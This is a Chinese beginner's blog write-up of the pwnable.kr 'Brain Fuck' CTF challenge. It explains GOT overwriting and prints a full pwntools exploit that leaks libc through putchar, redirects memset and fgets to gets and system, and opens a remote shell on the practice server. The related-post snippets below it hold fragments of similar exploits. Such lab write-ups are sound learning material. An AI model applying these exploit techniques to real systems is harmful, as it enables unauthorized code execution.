小白pwn之旅之pwnable10

最新推荐文章于 2024-01-12 19:51:43 发布
最新推荐文章于 2024-01-12 19:51:43 发布
阅读量224 收藏
点赞数
分类专栏: pwnable
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41078843/article/details/106396338
版权

Pwnable-----Brain Fuck

1.准备

在这里插入图片描述

将这两个文件下载到ubuntu.

什么是.so文件?

SO文件格式即ELF文件格式,它是Linux下可执行文件,共享库文件和目标文件的统一格式。这个像是一个依赖。

2.分析

还是老样子,我们看看文件属性
在这里插入图片描述
1.将bf拖到我们的破解大法IDA pro中
在这里插入图片描述
看看main()中的三个函数:puts() ,memset(), fget(). 再联想到题目竟然给出了libc.so 这多次一举的做法明显是让我们通过修改GOT表,从而修改函数。
刚好 memset()和 fgets()的参数都是同一个 我们就将 memset()改为gets(),将fgets()改为system()
这样我们就需要知道 memset()与fgets() 的got表地址,还要知道gets()和system()的全局地址。

2.我们点入do_brainfuck()函数
在这里插入图片描述

分析完了,就是要构造got。如果不明白PLT和GOT可以去看看这个
https://www.cnblogs.com/xingyun/archive/2011/12/10/2283149.html

exp

#coding:utf-8
from pwn import *
context.log_level = 'debug'
elf = ELF("./bf")
libc = ELF("./bf_libc.so")
# 处理地址部分
tape_addr = 0x0804A0A0 # p指向的tape的地址,也即是<、>影响的值
putchar_addr = 0x0804A030 # putchar地址,可在IDA或者objdump查到
putchar_libc_offset = libc.symbols['putchar'] # putchar在libc中的偏移地址
memset_addr = 0x0804A02C # memset地址,可在IDA或者objdump查到
memset_libc_offset = libc.symbols['memset'] # memset在libc中的偏移地址
fgets_addr = 0x0804A010 # fgets地址,可在IDA或者objdump查到
fgets_libc_offset = libc.symbols['fgets']# fgets在libc中的偏移地址
main_addr = 0x08048671 # main函数起始地址,可在IDA查到
raw_libc_base_addr = '' # 用于存放泄露的putchar真实地址
# 构造payload部分
payload = '' # 初始化payload
payload += '<' * (tape_addr - putchar_addr) # 调整p指向到putchar(0x0804A030)
payload += '.' # 调用一次putchar函数,让plt中有putchar真实地址的记录
payload += '.>' * 0x4 # 读取putchar真实地址
payload += '<' * 0x4 + ',>' * 0x4 # 返回到putchar函数的顶部(0x0804A030),并覆写putchar为main函数的地址(用于覆写完成后,回跳到程序中运行函数getshell)
payload += '<' * (putchar_addr - memset_addr + 4) # 调整p指向到memset(0x0804A02C)
payload += ',>' * 0x4 # 覆写memset为system函数地址
payload += '<' * (memset_addr - fgets_addr + 4) # 调整p指向到fgets(0x0804A010)
payload += ',>' * 0x4 # 覆写fgets为gets函数地址
payload += '.' # 调用putchar回跳到main中
#log.info("start send")
p = remote('pwnable.kr',9001)
#p = process("./bf")
p.recvuntil('welcome to brainfuck testing system!!\ntype some brainfuck instructions except [ ]\n')
p.sendline(payload)
#log.info("send end")
#gdb.attach(p,b*0x08048671)
# 计算libc基地址&各函数真实地址
p.recv(1) # 接收第一次调用putchar时,产生的1byte无用信息(\00)
raw_libc_base_addr = u32(p.recv(4)) # 接收泄露的putchar真实地址
libc_base_addr = raw_libc_base_addr - putchar_libc_offset # 泄露真实地址-函数在libc中偏移地址=libc基地址
gets_addr = libc_base_addr + libc.symbols['gets'] # 计算gets真实地址
system_addr = libc_base_addr + libc.symbols['system'] # 计算system真实地址
# 打印计算得到的各函数真实函数地址
log.success("putchar_addr = " + hex(raw_libc_base_addr))
log.success("libc_base_addr = " + hex(libc_base_addr))
log.success("gets_addr = " + hex(gets_addr))
log.success("system_addr = " + hex(system_addr))
# 输入各函数的地址
p.send(p32(main_addr))
p.send(p32(gets_addr))
p.send(p32(system_addr))
p.sendline('//bin/sh\0') # system参数,调用sh。\0为结束输入符
p.interactive()

大佬的代码,勉强自己能看懂,但自己还是不会写

最后getshell
在这里插入图片描述

轩冕
关注
专栏目录
PWN lotto [pwnable.kr]CTF writeup题解系列10
重新启程
01-02 838
目录 0x01题目 0x02解题思路 0x03题解 0x01题目 0x02解题思路 下载文件,检查一下情况 root@mypwn:/ctf/work/pwnable.kr# ssh lotto@pwnable.kr -p2222 lotto@pwnable.kr's password: ____ __ __ ____ ____ ____ ...
awd的批量脚本 pwn_记一次AWD反杀之旅
weixin_39611340的博客
12-20 1213
背景星盟团队的内部awd训练,邀请我们团队参加,然后想着也没什么事情就报名了。为什么说叫反杀之旅?因为最开始的时候由于技术师傅的手误,前两轮设置后台check扣分的时候多按了一个0,导致一次check扣了我们1000分。。。本来每个队初始分数是1000,结果我们一下变成了0,成了倒数第一。不过经过团队的紧张的补救以及多年的手速,在多扣了几百分的情况下最后追赶到了正数第二名的位置。觉得还挺有意思,所...
攻防世界pwn新手区题解-level3
weixin_62621015的博客
04-17 1156
攻防世界pwn-level3详细题解。
pwn训练 pwnable.kr brainfuck
doudoudedi
09-08 374
这是一道pwnable第二模块的题目 这道题开始看不懂emem,发现是一个brainfuck的解释器发现有对内存可以读写控制的函数还有一个野指针emem就是他了开始发现只要把memset函数覆写成为gets然后输入/bin/sh再是将fgets覆写成为system 第一步泄露putchar函数的真实地址然后算出libc基址 计算出system,gets的地址 在将putchar写成main 然后就...
pwnable brain fuck(bss段的用途)
九层台
09-26 673
题目链接传送门 这里题目跟网鼎杯线下赛的一个pwn有些相似。 输入一些字符可以控制一个指针,可以向这个指针指向的地址处写数据。 首先要知道bss段里面有什么。 在这道题里面的p指针的更高地址处是stdin,stdout,stderr然后是函数的got表,这里可以控制指针p泄露和修改got表。 #coding=utf-8 from pwn import * p=0x0804a0a0 putcha...
PWN PWN PWN !!! 技巧 (5)
Xzzzz911的博客
11-02 678
紧接上续四部,这次准备记录一下常见的函数的功能(容易忘记,记录一手),好记性不如烂笔头了解函数的作用,可以更好的让我们在代码审计的过程理清程序的之间的逻辑,加油加油!!!
(BUUCTF)pwnable_bf
最新发布
xy1458214551的博客
01-12 409
BUUCTF的pwnable_bf题解
PWN入门之数组越界-附件资源
03-05
PWN入门之数组越界-附件资源
pwn学习:pwnable.kr bof
Richard_pl的博客
03-12 480
Day 3: Study pwn via pwnable.kr——bof 写在前面: 记录自己的学习过程,从零开始。。。第三天!!! 首先下载文件 打开.c文件查看源码 可以看出本次的最终目标就是覆盖key值。漏洞可能在gets函数上。 使用gdb打开二进制文件 也可以通过IDA进行分析 打开文件,查看文件开启的保护措施并设置若干断点。 通过汇编程序查找到相关变量的地址 我们的最终目的...
【jarvisoj刷题之旅pwn题目Tell Me Something的writeup
iqiqiya的博客
10-14 1018
题目信息: file一下  发现是64位的ELF checksec检查下安全性 objdump -t 文件名   可以查看符号表 iqiqiya@521:~/Desktop/jarvisOJ$ objdump -t guestbook guestbook: file format elf64-x86-64 SYMBOL TABLE: 00000000004002...
小白pwn之旅pwnable02
qq_41078843的博客
04-28 204
pwnable----bof和flag bof是溢出 flag是加了壳 bof 直接访问上面的两个网址,下载bof和bof.c。用file bof查看bof文件,并用IDA打开 2.查看源代码bof.c #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int k...
日志 7.4 pwn
RobinZZX的博客
07-04 275
写入内存操作: 使用write() puts()等有泄露内存功能的函数,通过配置合适的参数如写入地址等等来完成写入 使用pop_r1_r2; mov [r1] r2;链来向r1寄存器的值所指向的地址写入 使用pop r2; xor r1 r1; xor r1 r2; xchg r1 r3; … mov [r1] r2; 链来向r1寄存器的值所指向的地址写入 ROP Emporium ret2c...
pwn暑假训练(六) cgpwna
doudoudedi
08-08 362
这道题是个32位栈溢出 fget()是一个安全的函数很难溢出 int message() { char s; // [esp+18h] [ebp-30h] n = 10; puts("you can leave some message here:"); fgets(A, 60, stdin); puts("your name please:"); fgets(&...
hackme inndy pwn veryoverflow writeup
charlie_heng的专栏
01-02 575
这次是最后一题了,做完这题一定要去复习!!!!(立了个flag。。。 这题有两种思路做,第一种是return2dl_resolve 第二种是泄漏libc,rop运行system(‘/bin/sh’) 因为想完美一点,所以一开始写的是第一种,写完了,在本地get到shell了,连到服务器,结果不行,一看,栈的地址开头是ff,这个也代表eof。。。不吐槽了,现在来分别说下两种思路是怎么做的 其...
pwnable BrainFuck,GOT表重写
nibiru_holmes的博客
03-10 1204
题目链接:http://pwnable.kr/play.php BrainFuck是什么鬼,百度一下..... Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。 其实就是闲着没事做出来的一种语言。 看看
pwnable.tw - orw
不急不躁
07-09 3066
简单概览 与 start 不同,该程序使用动态链接 提示仅允许有限的系统调用 open read write 函数 程序运行 哪怕是输入一个字母,程序仍然会出现段错误 检查安全措施 可见栈上开了 CANARY 程序 在 IDA 中反编译可见: 函数 orw_seccomp 反编译: 程序从终端读入内容,存放在 shellcode,然后执行该命令 ...
通过pwnable.kr从零学pwn
热门推荐
giantbranch的专栏
07-31 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51992512 下面的这个地址很多ctf的学习资源都是有推荐的 挑战地址:http://pwnable.kr/play.php fd 首先不用说给了就直接连上去 看一下代码 重要函数:read ssize_t read(int fd,void *
buuoj Pwn writeup 256-260
yongbaoii的博客
09-01 322
256 ciscn_2019_s_2 257 qwb2019_one 258 hxb_pwn300 259 others_easyheap 260 pwnable_bf # -*- coding: utf-8 -*- '''#coding:utf8 from pwn import * #预先生成一个可以pass的payload payload = '' for i in range(50): payload += '0' payload += p8(0x100-0x40 +
pwn暑假训练(十) emem这次的测验自己还是太菜
doudoudedi
08-14 764
记一下昨天的测验我直接讲我没过的题目 有system函数没有’bin/sh’只开了nx但gadget少的可怜题目直接给了libc那就不用想了直接找偏移…我同学给的libc偏移不对… Gadgets information ============================================================ 0x00000000004006d2 : pop rbp...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值